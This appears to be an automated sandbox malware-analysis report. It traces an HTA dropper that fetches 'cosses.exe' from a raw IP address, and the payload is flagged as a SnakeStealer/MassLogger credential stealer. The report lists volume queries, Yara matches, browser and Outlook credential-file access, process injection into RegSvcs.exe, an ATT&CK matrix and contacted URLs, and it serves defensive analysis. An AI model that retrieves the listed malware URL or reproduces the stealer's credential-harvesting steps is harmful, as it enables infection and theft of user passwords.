Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00544E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_00544E87

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00551E06 GetUserNameW,

6_2_00551E06

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00543F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

6_2_00543F3A

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_005149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

6_2_005149A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MSIL Logger

Source: Yara match	File source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: cossess.exe	Binary or memory string: WIN_81
Source: cossess.exe	Binary or memory string: WIN_XP
Source: cossess.exe	Binary or memory string: WIN_XPe
Source: cossess.exe	Binary or memory string: WIN_VISTA
Source: cossess.exe	Binary or memory string: WIN_7
Source: cossess.exe	Binary or memory string: WIN_8
Source: cosses[1].exe.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2104403601.0000000002656000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Remote Access Functionality

Yara detected MSIL Logger

Source: Yara match	File source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00586283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		6_2_00586283
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00586747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		6_2_00586747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	12 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	138 System Information Discovery	Distributed Component Object Model	121 Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	11 Masquerading	LSA Secrets	341 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
niceworkingskillgivenmebest.hta	37%	Virustotal		Browse
niceworkingskillgivenmebest.hta	28%	ReversingLabs	Script-WScript.Trojan.Asthma

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\cossess.exe	100%	Avira	TR/AD.SnakeStealer.suecj
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe	100%	Avira	TR/AD.SnakeStealer.suecj
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe	67%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Roaming\cossess.exe	67%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label
http://198.12.89.24/346/cosses.exe	0%	Avira URL Cloud	safe
http://checkip.dyndns.com0	0%	Avira URL Cloud	safe
http://198.12.89.24/346/cosses.e	0%	Avira URL Cloud	safe
http://198.12.89.24/346/cosses.exeW	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.112.1	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://198.12.89.24/346/cosses.exe	true	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.orgd	RegSvcs.exe, 00000007.00000002.2104403601.00000000025CD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000009.00000003.1202964660.0000023D373B0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr	false		high
http://crl.ver)	svchost.exe, 00000009.00000002.2105524983.0000023D37600000.00000004.00000020.00020000.00000000.sdmp	false		high
http://198.12.89.24/346/cosses.e	powershell.exe, 00000003.00000002.981931540.0000000005393000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://198.12.89.24/346/cosses.exeW	powershell.exe, 00000003.00000002.989978831.0000000007555000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.000000000259E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod1C:	qmgr.db.9.dr	false		high
http://checkip.dyndns.com0	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189l	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000003.00000002.989916435.0000000007480000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.981931540.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	cossess.exe, 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	false		high
